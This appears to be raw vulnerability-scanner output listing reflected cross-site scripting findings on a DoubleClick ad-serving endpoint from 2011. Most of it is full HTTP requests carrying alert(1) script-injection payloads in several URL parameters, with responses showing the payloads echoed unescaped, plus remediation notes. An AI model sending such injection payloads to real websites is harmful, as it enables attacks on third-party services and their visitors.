The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48133'-alert(1)-'2b1ac901df0 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=48133'-alert(1)-'2b1ac901df0 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5961 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:27 GMT Expires: Sat, 29 Jan 2011 05:20:27 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... a9e/7/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=48133'-alert(1)-'2b1ac901df0http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f109"-alert(1)-"9fa48e39d89 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=9f109"-alert(1)-"9fa48e39d89 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5961 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:27 GMT Expires: Sat, 29 Jan 2011 05:20:27 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... a9e/7/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=9f109"-alert(1)-"9fa48e39d89http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "" ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5824"-alert(1)-"01a281d1dec was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6a5824"-alert(1)-"01a281d1dec&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:19 GMT Expires: Sat, 29 Jan 2011 05:20:19 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6a5824"-alert(1)-"01a281d1dec&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFou ...[SNIP]...
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 985b8'-alert(1)-'e81dfefbfce was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6985b8'-alert(1)-'e81dfefbfce&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:20 GMT Expires: Sat, 29 Jan 2011 05:20:20 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... .doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6985b8'-alert(1)-'e81dfefbfce&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa55'-alert(1)-'c93eebcb7dc was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391faa55'-alert(1)-'c93eebcb7dc&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:17 GMT Expires: Sat, 29 Jan 2011 05:20:17 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... //ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391faa55'-alert(1)-'c93eebcb7dc&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e2f"-alert(1)-"29247c7cc7e was submitted in the mid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391f5e2f"-alert(1)-"29247c7cc7e&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:16 GMT Expires: Sat, 29 Jan 2011 05:20:16 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... //ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391f5e2f"-alert(1)-"29247c7cc7e&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTa ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b627"-alert(1)-"f37e95824ee was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543933b627"-alert(1)-"f37e95824ee&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:21 GMT Expires: Sat, 29 Jan 2011 05:20:21 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ck.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543933b627"-alert(1)-"f37e95824ee&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false ...[SNIP]...
The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f838'-alert(1)-'0c67bb9771d was submitted in the sid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543937f838'-alert(1)-'0c67bb9771d&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:22 GMT Expires: Sat, 29 Jan 2011 05:20:22 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ck.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543937f838'-alert(1)-'0c67bb9771d&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af20'-alert(1)-'1a377f66add was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2562924af20'-alert(1)-'1a377f66add&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:15 GMT Expires: Sat, 29 Jan 2011 05:20:15 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2562924af20'-alert(1)-'1a377f66add&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965de"-alert(1)-"48eda9b2c46 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292965de"-alert(1)-"48eda9b2c46&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:14 GMT Expires: Sat, 29 Jan 2011 05:20:14 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292965de"-alert(1)-"48eda9b2c46&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fs ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bab'-alert(1)-'48cd638711e was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=845bab'-alert(1)-'48cd638711e&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:25 GMT Expires: Sat, 29 Jan 2011 05:20:25 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=845bab'-alert(1)-'48cd638711e&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97619"-alert(1)-"aee72703284 was submitted in the tp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=897619"-alert(1)-"aee72703284&forced_click=;ord=20110129011946?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6003 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:24 GMT Expires: Sat, 29 Jan 2011 05:20:24 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:45 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... ick%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=897619"-alert(1)-"aee72703284&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false; var wm ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 159c7'-alert(1)-'21f1ab1a58 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0159c7'-alert(1)-'21f1ab1a58&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5990 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:24 GMT Expires: Sat, 29 Jan 2011 05:20:24 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... net/click%3Bh%3Dv8/3a9e/f/7d/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0159c7'-alert(1)-'21f1ab1a58&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc101"-alert(1)-"4c6cf87a680 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0dc101"-alert(1)-"4c6cf87a680&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5994 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:23 GMT Expires: Sat, 29 Jan 2011 05:20:23 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0dc101"-alert(1)-"4c6cf87a680&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false; v ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bef7"-alert(1)-"8089e6c04bf was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=7bef7"-alert(1)-"8089e6c04bf HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5952 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:28 GMT Expires: Sat, 29 Jan 2011 05:20:28 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3a9e/7/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=7bef7"-alert(1)-"8089e6c04bfhttp://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "" ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7ea6'-alert(1)-'1fafd552781 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=d7ea6'-alert(1)-'1fafd552781 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5952 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:29 GMT Expires: Sat, 29 Jan 2011 05:20:29 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue Jan 18 19:52:51 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... 3a9e/7/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=d7ea6'-alert(1)-'1fafd552781http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi\"> ...[SNIP]...
